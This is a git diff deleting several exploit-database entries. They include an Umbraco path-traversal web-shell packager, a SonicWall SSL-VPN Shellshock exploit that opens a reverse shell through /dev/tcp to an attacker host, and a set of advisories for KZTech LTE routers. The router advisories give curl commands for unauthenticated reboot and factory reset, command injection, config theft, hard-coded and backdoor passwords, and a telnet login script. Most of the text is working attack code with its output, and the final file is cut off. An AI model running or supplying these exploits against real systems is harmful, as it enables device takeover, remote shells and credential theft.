diff --git a/exploits/aspx/webapps/50241.py b/exploits/aspx/webapps/50241.py
deleted file mode 100755
index f4f22656b..000000000
--- a/exploits/aspx/webapps/50241.py
+++ /dev/null
@@ -1,72 +0,0 @@
-# Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)
-# Exploit Author: BitTheByte
-# Description: Authenticated path traversal vulnerability.
-# Exploit Research: https://www.tenable.com/security/research/tra-2020-59
-# Vendor Homepage: https://umbraco.com/
-# Version: <= 8.9.1
-# CVE : CVE-2020-5811
-
-import string
-import random
-import argparse
-import zipfile
-import os
-
-package_xml = f"""
-
-
-
- {{filename}}
- {{upload_path}}
- {{filename}}
-
-
-
-
- PoC-{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))}
- 1.0.0
-
- MIT License
- https://example.com
-
- 0
- 0
- 0
-
-
-
- CVE-2020-5811
- https://example.com
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-"""
-
-parser = argparse.ArgumentParser(description='CVE-2020-5811')
-parser.add_argument('--shell', type=str, help='Shell file to upload', required=True)
-parser.add_argument('--upload-path', type=str, help='Shell file update path on target server (default=~/../scripts)', default='~/../scripts')
-args = parser.parse_args()
-
-if not os.path.isfile(args.shell):
- print("[ERROR] please use a correct path for the shell file.")
-
-output_file = "exploit.zip"
-
-package = zipfile.ZipFile(output_file, 'w')
-package.writestr('package.xml', package_xml.format(filename=os.path.basename(args.shell), upload_path=args.upload_path))
-package.writestr(os.path.basename(args.shell), open(args.shell, 'r').read())
-package.close()
-
-print(f"[DONE] Created Umbraco package: {output_file}")
\ No newline at end of file
diff --git a/exploits/hardware/dos/49685.txt b/exploits/hardware/dos/49685.txt
deleted file mode 100644
index 1d2d9a81b..000000000
--- a/exploits/hardware/dos/49685.txt
+++ /dev/null
@@ -1,68 +0,0 @@
-# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)
-# Date: 03.02.2021
-# Exploit Author: LiquidWorm
-# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
-
-Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
-Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
- http://www.jatontec.com/products/show.php?itemid=258
- http://www.jatontech.com/CAT12.html#_pp=105_564
- http://www.kzbtech.com/AM3300V.html
- https://neotel.mk/ostanati-paketi-2/
-
-Affected version: Model | Firmware
- -------|---------
- JT3500V | 2.0.1B1064
- JT3300V | 2.0.1B1047
- AM6200M | 2.0.0B3210
- AM6000N | 2.0.0B3042
- AM5000W | 2.0.0B3037
- AM4200M | 2.0.0B2996
- AM4100V | 2.0.0B2988
- AM3500MW | 2.0.0B1092
- AM3410V | 2.0.0B1085
- AM3300V | 2.0.0B1060
- AM3100E | 2.0.0B981
- AM3100V | 2.0.0B946
- AM3000M | 2.0.0B21
- KZ7621U | 2.0.0B14
- KZ3220M | 2.0.0B04
- KZ3120R | 2.0.0B01
-
-Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
-& VoIP CPE product specially designed to enable quick and easy
-LTE fixed data service deployment for residential and SOHO customers.
-It provides high speed LAN, Wi-Fi and VoIP integrated services
-to end users who need both bandwidth and multi-media data service
-in residential homes or enterprises. The device has 2 Gigabit LAN
-ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
-CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
-and firewall software for security. It provides an effective
-all-in-one solution to SOHO or residential customers. It can
-deliver up to 1Gbps max data throughput which can be very
-competitive to wired broadband access service.
-
-Desc: The device allows unauthenticated attackers to restart the
-device with an HTTP GET request to /goform/RestartDevice page.
-
-Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
- Linux 2.6.36+ (mips)
- Mediatek APSoC SDK v4.3.1.0
-
-
-Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
- @zeroscience
-
-
-Advisory ID: ZSL-2021-5643
-Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5643.php
-
-
-03.02.2021
-
---
-
-
-$ curl -sk https://192.168.1.1/goform/RestartDevice
-success
-$
\ No newline at end of file
diff --git a/exploits/hardware/remote/49682.txt b/exploits/hardware/remote/49682.txt
deleted file mode 100644
index 8639bb59d..000000000
--- a/exploits/hardware/remote/49682.txt
+++ /dev/null
@@ -1,92 +0,0 @@
-# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access
-# Date: 03.02.2021
-# Exploit Author: LiquidWorm
-# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
-
-Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
-Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
- http://www.jatontec.com/products/show.php?itemid=258
- http://www.jatontech.com/CAT12.html#_pp=105_564
- http://www.kzbtech.com/AM3300V.html
- https://neotel.mk/ostanati-paketi-2/
-
-Affected version: Model | Firmware
- -------|---------
- JT3500V | 2.0.1B1064
- JT3300V | 2.0.1B1047
- AM6200M | 2.0.0B3210
- AM6000N | 2.0.0B3042
- AM5000W | 2.0.0B3037
- AM4200M | 2.0.0B2996
- AM4100V | 2.0.0B2988
- AM3500MW | 2.0.0B1092
- AM3410V | 2.0.0B1085
- AM3300V | 2.0.0B1060
- AM3100E | 2.0.0B981
- AM3100V | 2.0.0B946
- AM3000M | 2.0.0B21
- KZ7621U | 2.0.0B14
- KZ3220M | 2.0.0B04
- KZ3120R | 2.0.0B01
-
-Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
-& VoIP CPE product specially designed to enable quick and easy
-LTE fixed data service deployment for residential and SOHO customers.
-It provides high speed LAN, Wi-Fi and VoIP integrated services
-to end users who need both bandwidth and multi-media data service
-in residential homes or enterprises. The device has 2 Gigabit LAN
-ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
-CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
-and firewall software for security. It provides an effective
-all-in-one solution to SOHO or residential customers. It can
-deliver up to 1Gbps max data throughput which can be very
-competitive to wired broadband access service.
-
-Desc: The device utilizes hard-coded credentials within its Linux
-distribution image. These sets of credentials are never exposed to
-the end-user and cannot be changed through any normal operation of
-the router.
-
-Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
- Linux 2.6.36+ (mips)
- Mediatek APSoC SDK v4.3.1.0
-
-
-Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
- @zeroscience
-
-
-Advisory ID: ZSL-2021-5637
-Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5637.php
-
-
-03.02.2021
-
---
-
-
-Default web creds:
-------------------
-admin:admin123
-user:user123
-
-Telnet/SSH access:
-------------------
-admin:root123
-
-===
-
-import telnetlib
-
-host="192.168.1.1"
-user="admin"
-password="root123"
-s=telnetlib.Telnet(host)
-s.read_until(b"CPE login: ")
-s.write(user.encode('ascii') + b"\n")
-s.read_until(b"Password: ")
-s.write(password.encode('ascii') + b"\n")
-s.write(b"busybox\n")
-print(s.read_all().decode('ascii'))
-s.mt_interact()
-s.close()
\ No newline at end of file
diff --git a/exploits/hardware/remote/49695.txt b/exploits/hardware/remote/49695.txt
deleted file mode 100644
index 261b2dd82..000000000
--- a/exploits/hardware/remote/49695.txt
+++ /dev/null
@@ -1,82 +0,0 @@
-# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm
-# Date: 03.02.2021
-# Exploit Author: LiquidWorm
-# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
-
-Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
-Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
- http://www.jatontec.com/products/show.php?itemid=258
- http://www.jatontech.com/CAT12.html#_pp=105_564
- http://www.kzbtech.com/AM3300V.html
- https://neotel.mk/ostanati-paketi-2/
-
-Affected version: Model | Firmware
- -------|---------
- JT3500V | 2.0.1B1064
- JT3300V | 2.0.1B1047
- AM6200M | 2.0.0B3210
- AM6000N | 2.0.0B3042
- AM5000W | 2.0.0B3037
- AM4200M | 2.0.0B2996
- AM4100V | 2.0.0B2988
- AM3500MW | 2.0.0B1092
- AM3410V | 2.0.0B1085
- AM3300V | 2.0.0B1060
- AM3100E | 2.0.0B981
- AM3100V | 2.0.0B946
- AM3000M | 2.0.0B21
- KZ7621U | 2.0.0B14
- KZ3220M | 2.0.0B04
- KZ3120R | 2.0.0B01
-
-Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
-& VoIP CPE product specially designed to enable quick and easy
-LTE fixed data service deployment for residential and SOHO customers.
-It provides high speed LAN, Wi-Fi and VoIP integrated services
-to end users who need both bandwidth and multi-media data service
-in residential homes or enterprises. The device has 2 Gigabit LAN
-ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
-CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
-and firewall software for security. It provides an effective
-all-in-one solution to SOHO or residential customers. It can
-deliver up to 1Gbps max data throughput which can be very
-competitive to wired broadband access service.
-
-Desc: The device generates its SSID and password based on the
-WAN MAC address.
-
-Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
- Linux 2.6.36+ (mips)
- Mediatek APSoC SDK v4.3.1.0
-
-
-Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
- @zeroscience
-
-
-Advisory ID: ZSL-2021-5638
-Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5638.php
-
-
-03.02.2021
-
---
-
-
-Example defaults:
-
-# ifconfig |grep HWaddr
-br0 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
-br0:9 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
-eth2 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
-eth2.1 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
-eth2.100 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
-eth2.1000 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
-eth2.2 Link encap:Ethernet HWaddr 6C:AD:EF:FF:00:01
-ra0 Link encap:Ethernet HWaddr 6C:AD:EF:5D:7C:5C
-rai0 Link encap:Ethernet HWaddr 6C:AD:EF:5E:7C:5C
-
-SSID1=MyWiFi-167C5D
-SSID1=MyWiFi-5G-167C5D
-
-WiFi password = EF167C5D
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49499.py b/exploits/hardware/webapps/49499.py
deleted file mode 100755
index c6ff15e80..000000000
--- a/exploits/hardware/webapps/49499.py
+++ /dev/null
@@ -1,105 +0,0 @@
-# Exploit Title: SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)
-# Exploit Author: Darren Martyn
-# Vendor Homepage: https://www.home-assistant.io/
-# Version: < SMA 8.0.0.4
-# Blog post: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
-
-#!/usr/bin/python
-# coding: utf-8
-# Author: Darren Martyn
-# Credit: Phineas Fisher
-# Notes:
-# This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team
-# and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command
-# execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns
-# a trivial reverse shell using /dev/tcp.
-# There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but
-# implementing that is left as an exercise for the reader. I've seen a few approaches, and
-# would be interested in seeing yours.
-# There is another LPE that works only on some models which I also have removed from this.
-# Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
-import requests
-import sys
-import telnetlib
-import socket
-from threading import Thread
-from requests.packages.urllib3.exceptions import InsecureRequestWarning
-requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
-import time
-
-def banner():
- print """
-
- 88 88
- "" 88
- 88
-8b d8 88 ,adPPYba, 88 88 ,adPPYYba, 88
-`8b d8' 88 I8[ "" 88 88 "" `Y8 88
- `8b d8' 88 `"Y8ba, 88 88 ,adPPPPP88 88
- `8b,d8' 88 aa ]8I "8a, ,a88 88, ,88 88
- "8" 88 `"YbbdP"' `"YbbdP'Y8 `"8bbdP"Y8 88
-
-
-
- 88
- 88
- 88
- ,adPPYb,88 ,adPPYba, ,adPPYba, 8b,dPPYba,
- a8" `Y88 a8" "8a a8" "8a 88P' "Y8
- 8b 88 8b d8 8b d8 88
- "8a, ,d88 "8a, ,a8" "8a, ,a8" 88
- `"8bbdP"Y8 `"YbbdP"' `"YbbdP"' 88
- SonicWall SSL-VPN Appliance Remote Exploit
-Public Release (Jan 2021). Author: Darren Martyn. Credit
-goes to Phineas Fisher for this. Stay inside, do crimes.
- """
-
-def handler(lp): # handler borrowed from Stephen Seeley.
- print "(+) starting handler on port %d" %(lp)
- t = telnetlib.Telnet()
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.bind(("0.0.0.0", lp))
- s.listen(1)
- conn, addr = s.accept()
- print "(+) connection from %s" %(addr[0])
- t.sock = conn
- print "(+) pop thy shell!"
- t.interact()
-
-def execute_command(target, command):
- url = target + "/cgi-bin/jarrewrite.sh"
- headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)}
- r = requests.get(url=url, headers=headers, verify=False)
- return r.text
-
-def check_exploitable(target):
- print "(+) Testing %s for pwnability..." %(target)
- output = execute_command(target=target, command="cat /etc/passwd")
- if "root:" in output:
- print "(*) We can continue, time to wreck this shit."
- return True
- else:
- return False
-
-def pop_reverse_shell(target, cb_host, cb_port):
- print "(+) Sending callback to %s:%s" %(cb_host, cb_port)
- backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port)
- execute_command(target=target, command=backconnect)
-
-def hack_the_planet(target, cb_host, cb_port):
- if check_exploitable(target) == True:
- pass
- else:
- sys.exit("(-) Target not exploitable...")
- handlerthr = Thread(target=handler, args=(int(cb_port),))
- handlerthr.start()
- pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port)
-
-def main(args):
- banner()
- if len(args) != 4:
- sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0]))
- hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3])
-
-if __name__ == "__main__":
- main(args=sys.argv)
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49680.txt b/exploits/hardware/webapps/49680.txt
deleted file mode 100644
index d777856eb..000000000
--- a/exploits/hardware/webapps/49680.txt
+++ /dev/null
@@ -1,83 +0,0 @@
-# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)
-# Date: 03.02.2021
-# Exploit Author: LiquidWorm
-# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
-
-Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
-Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
- http://www.jatontec.com/products/show.php?itemid=258
- http://www.jatontech.com/CAT12.html#_pp=105_564
- http://www.kzbtech.com/AM3300V.html
- https://neotel.mk/ostanati-paketi-2/
-
-Affected version: Model | Firmware
- -------|---------
- JT3500V | 2.0.1B1064
- JT3300V | 2.0.1B1047
- AM6200M | 2.0.0B3210
- AM6000N | 2.0.0B3042
- AM5000W | 2.0.0B3037
- AM4200M | 2.0.0B2996
- AM4100V | 2.0.0B2988
- AM3500MW | 2.0.0B1092
- AM3410V | 2.0.0B1085
- AM3300V | 2.0.0B1060
- AM3100E | 2.0.0B981
- AM3100V | 2.0.0B946
- AM3000M | 2.0.0B21
- KZ7621U | 2.0.0B14
- KZ3220M | 2.0.0B04
- KZ3120R | 2.0.0B01
-
-Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
-& VoIP CPE product specially designed to enable quick and easy
-LTE fixed data service deployment for residential and SOHO customers.
-It provides high speed LAN, Wi-Fi and VoIP integrated services
-to end users who need both bandwidth and multi-media data service
-in residential homes or enterprises. The device has 2 Gigabit LAN
-ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
-CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
-and firewall software for security. It provides an effective
-all-in-one solution to SOHO or residential customers. It can
-deliver up to 1Gbps max data throughput which can be very
-competitive to wired broadband access service.
-
-Desc: The application suffers from an authenticated OS command
-injection vulnerability. This can be exploited to inject and
-execute arbitrary shell commands through the 'pingAddr' HTTP
-POST parameter bypassing the injection protection filter.
-
-Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
- Linux 2.6.36+ (mips)
- Mediatek APSoC SDK v4.3.1.0
-
-
-Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
- @zeroscience
-
-
-Advisory ID: ZSL-2021-5635
-Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5635.php
-
-
-03.02.2021
-
---
-
-
-#JT3300V/AM3300V
-lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
- --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
- -H "Cookie: kz_userid=admin:311139" \
- -H "X-Requested-With: XMLHttpRequest"
-ping: bad address 'Linux'
-lqwrm@metalgear:~/prive$
-
-
-#JT3500V
-lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
- --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
- -H "Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b" \
- -H "X-Requested-With: XMLHttpRequest"
-ping: bad address 'Linux'
-lqwrm@metalgear:~/prive$
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49681.txt b/exploits/hardware/webapps/49681.txt
deleted file mode 100644
index 968044764..000000000
--- a/exploits/hardware/webapps/49681.txt
+++ /dev/null
@@ -1,89 +0,0 @@
-# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass
-# Date: 03.02.2021
-# Exploit Author: LiquidWorm
-# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
-
-Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
-Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
- http://www.jatontec.com/products/show.php?itemid=258
- http://www.jatontech.com/CAT12.html#_pp=105_564
- http://www.kzbtech.com/AM3300V.html
- https://neotel.mk/ostanati-paketi-2/
-
-Affected version: Model | Firmware
- -------|---------
- JT3500V | 2.0.1B1064
- JT3300V | 2.0.1B1047
- AM6200M | 2.0.0B3210
- AM6000N | 2.0.0B3042
- AM5000W | 2.0.0B3037
- AM4200M | 2.0.0B2996
- AM4100V | 2.0.0B2988
- AM3500MW | 2.0.0B1092
- AM3410V | 2.0.0B1085
- AM3300V | 2.0.0B1060
- AM3100E | 2.0.0B981
- AM3100V | 2.0.0B946
- AM3000M | 2.0.0B21
- KZ7621U | 2.0.0B14
- KZ3220M | 2.0.0B04
- KZ3120R | 2.0.0B01
-
-Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
-& VoIP CPE product specially designed to enable quick and easy
-LTE fixed data service deployment for residential and SOHO customers.
-It provides high speed LAN, Wi-Fi and VoIP integrated services
-to end users who need both bandwidth and multi-media data service
-in residential homes or enterprises. The device has 2 Gigabit LAN
-ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
-CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
-and firewall software for security. It provides an effective
-all-in-one solution to SOHO or residential customers. It can
-deliver up to 1Gbps max data throughput which can be very
-competitive to wired broadband access service.
-
-Desc: The application suffers from an authentication bypass
-vulnerability. An unauthenticated attacker can disclose sensitive
-and clear-text information resulting in authentication bypass by
-downloading the configuration of the device and revealing the
-admin password.
-
-Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
- Linux 2.6.36+ (mips)
- Mediatek APSoC SDK v4.3.1.0
-
-
-Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
- @zeroscience
-
-
-Advisory ID: ZSL-2021-5636
-Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5636.php
-
-
-03.02.2021
-
---
-
-
-$ curl -s \
- -o configtest.zlib \ # Default: config.dat
- 'http://192.168.1.1:8080/cgi-bin/export_settings.cgi' ; \
- binwalk -e configtest.zlib ; \
- cd _configtest.zlib_extracted ; \
- strings * | grep -ni 'Login\|Password\|Telnet\|Guest' ; \
- # cat /tmp/nvramconfig/RT28060_CONFIG_VLAN \ # On device
- cd ..
-
-3:Login=admin
-4:Password=neotelwings
-5:TelnetPwd=root123
-6:GuestId=user
-7:GuestPassword=user123
-89:DDNSPassword=
-239:auto_update_password=
-279:Tr069_Password=
-288:Tr069_ConnectionRequestPassword=admin
-300:Tr069_STUNPassword=
-339:telnetManagement=2
-$
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49683.txt b/exploits/hardware/webapps/49683.txt
deleted file mode 100644
index 46bf530db..000000000
--- a/exploits/hardware/webapps/49683.txt
+++ /dev/null
@@ -1,124 +0,0 @@
-# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution
-# Date: 03.02.2021
-# Exploit Author: LiquidWorm
-# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
-
-Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
-Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
- http://www.jatontec.com/products/show.php?itemid=258
- http://www.jatontech.com/CAT12.html#_pp=105_564
- http://www.kzbtech.com/AM3300V.html
- https://neotel.mk/ostanati-paketi-2/
-
-Affected version: Model | Firmware
- -------|---------
- JT3500V | 2.0.1B1064
- JT3300V | 2.0.1B1047
- AM6200M | 2.0.0B3210
- AM6000N | 2.0.0B3042
- AM5000W | 2.0.0B3037
- AM4200M | 2.0.0B2996
- AM4100V | 2.0.0B2988
- AM3500MW | 2.0.0B1092
- AM3410V | 2.0.0B1085
- AM3300V | 2.0.0B1060
- AM3100E | 2.0.0B981
- AM3100V | 2.0.0B946
- AM3000M | 2.0.0B21
- KZ7621U | 2.0.0B14
- KZ3220M | 2.0.0B04
- KZ3120R | 2.0.0B01
-
-Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
-& VoIP CPE product specially designed to enable quick and easy
-LTE fixed data service deployment for residential and SOHO customers.
-It provides high speed LAN, Wi-Fi and VoIP integrated services
-to end users who need both bandwidth and multi-media data service
-in residential homes or enterprises. The device has 2 Gigabit LAN
-ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
-CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
-and firewall software for security. It provides an effective
-all-in-one solution to SOHO or residential customers. It can
-deliver up to 1Gbps max data throughput which can be very
-competitive to wired broadband access service.
-
-Desc: The device has several backdoors and hidden pages that
-allow remote code execution, overwriting of the bootrom and
-enabling debug mode.
-
-Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
- Linux 2.6.36+ (mips)
- Mediatek APSoC SDK v4.3.1.0
-
-
-Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
- @zeroscience
-
-
-Advisory ID: ZSL-2021-5639
-Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5639.php
-
-
-03.02.2021
-
---
-
-
-Older and newer models defer in backdoor code.
-By navigating to /syscmd.html or /syscmd.asp pages
-an attacker can authenticate and execute system
-commands with highest privileges.
-
-Old models (syscmd.asp) password: super1234
-
-Newer models (syscmd.html) password: md5(WAN_MAC+version):
-
-$ curl -k https://192.168.1.1/goform/getImgVersionInfo
-{"currentImg":["1", "Y", "V2.0.0B3210"], "shadowImg":["0", "Y", "V2.0.0B04"]}
-
-...
-pcVar6 = (char *)nvram_bufget(1,"WAN_MAC_ADDR");
- if (*pcVar6 == 0) {
- pcVar6 = "6C:AD:EF:00:00:01";
- }
- memset(acStack280,0,0x100);
- sprintf(acStack280,"generate debug password : %s %s",pcVar6,"V2.0.0B3210");
- ...
- psMd5Init(auStack112);
- psMd5Update(auStack112,local_10,local_c);
- psMd5Final(auStack112,uParm1);
- return;
-...
-
-
-Another 2 backdoors exist using the websCheckCookie() and specific header strings.
-
-...
- iVar2 = strncmp(acStack2268,"UPGRADE:927",0xb);
- if (iVar2 != 0) {
- return 0xffffffff;
- }
- if ((*(char **)(iParm1 + 0xdc) != (char *)0x0) &&
- (iVar2 = strncmp(*(char **)(iParm1 + 0xdc),"TONY@KZT",8), iVar2 != 0)) {
- return 0xffffffff;
- ...
- if (iVar1 != 0) goto LAB_0047c304;
-LAB_0047c32c:
- WebsDbgLog(2,"[%s] UserAgent=%s, username=%s,command=%s","startSysCmd",__s1_00,__s1_01,__s1);
-LAB_0047c35c:
- __n = strlen(__s1);
- if (__n == 0) {
- snprintf(acStack1560,0x200,"cat /dev/null > %s","/var/system_command.log");
- WebsDbgLog(3,"[%s] %s","startSysCmd",acStack1560);
- system(acStack1560);
- websWrite(iParm1,"invalid command!");
- goto LAB_0047c3f8;
- }
-...
-
-
-Bypass the backdoor password request and enable debug mode from within the web console:
-
-$('#div_check').modal('hide'); <--- syscmd.html
-
-g_password_check_alert.close(); <--- syscmd.asp
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49684.txt b/exploits/hardware/webapps/49684.txt
deleted file mode 100644
index 32978e15b..000000000
--- a/exploits/hardware/webapps/49684.txt
+++ /dev/null
@@ -1,72 +0,0 @@
-# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)
-# Date: 03.02.2021
-# Exploit Author: LiquidWorm
-# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
-
-Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
-Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
- http://www.jatontec.com/products/show.php?itemid=258
- http://www.jatontech.com/CAT12.html#_pp=105_564
- http://www.kzbtech.com/AM3300V.html
- https://neotel.mk/ostanati-paketi-2/
-
-Affected version: Model | Firmware
- -------|---------
- JT3500V | 2.0.1B1064
- JT3300V | 2.0.1B1047
- AM6200M | 2.0.0B3210
- AM6000N | 2.0.0B3042
- AM5000W | 2.0.0B3037
- AM4200M | 2.0.0B2996
- AM4100V | 2.0.0B2988
- AM3500MW | 2.0.0B1092
- AM3410V | 2.0.0B1085
- AM3300V | 2.0.0B1060
- AM3100E | 2.0.0B981
- AM3100V | 2.0.0B946
- AM3000M | 2.0.0B21
- KZ7621U | 2.0.0B14
- KZ3220M | 2.0.0B04
- KZ3120R | 2.0.0B01
-
-Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
-& VoIP CPE product specially designed to enable quick and easy
-LTE fixed data service deployment for residential and SOHO customers.
-It provides high speed LAN, Wi-Fi and VoIP integrated services
-to end users who need both bandwidth and multi-media data service
-in residential homes or enterprises. The device has 2 Gigabit LAN
-ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
-CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
-and firewall software for security. It provides an effective
-all-in-one solution to SOHO or residential customers. It can
-deliver up to 1Gbps max data throughput which can be very
-competitive to wired broadband access service.
-
-Desc: The device allows unauthenticated attackers to visit the
-unprotected /goform/LoadDefaultSettings endpoint and reset the
-device to its factory default settings. Once the GET request is
-made, the device will reboot with its default settings allowing
-the attacker to bypass authentication and take full control of
-the system.
-
-Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
- Linux 2.6.36+ (mips)
- Mediatek APSoC SDK v4.3.1.0
-
-
-Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
- @zeroscience
-
-
-Advisory ID: ZSL-2021-5642
-Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5642.php
-
-
-03.02.2021
-
---
-
-
-$ curl -sk https://192.168.1.1/goform/LoadDefaultSettings
-success
-$
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49686.txt b/exploits/hardware/webapps/49686.txt
deleted file mode 100644
index e5535f782..000000000
--- a/exploits/hardware/webapps/49686.txt
+++ /dev/null
@@ -1,70 +0,0 @@
-# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)
-# Date: 03.02.2021
-# Exploit Author: LiquidWorm
-# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
-
-Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
-Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
- http://www.jatontec.com/products/show.php?itemid=258
- http://www.jatontech.com/CAT12.html#_pp=105_564
- http://www.kzbtech.com/AM3300V.html
- https://neotel.mk/ostanati-paketi-2/
-
-Affected version: Model | Firmware
- -------|---------
- JT3500V | 2.0.1B1064
- JT3300V | 2.0.1B1047
- AM6200M | 2.0.0B3210
- AM6000N | 2.0.0B3042
- AM5000W | 2.0.0B3037
- AM4200M | 2.0.0B2996
- AM4100V | 2.0.0B2988
- AM3500MW | 2.0.0B1092
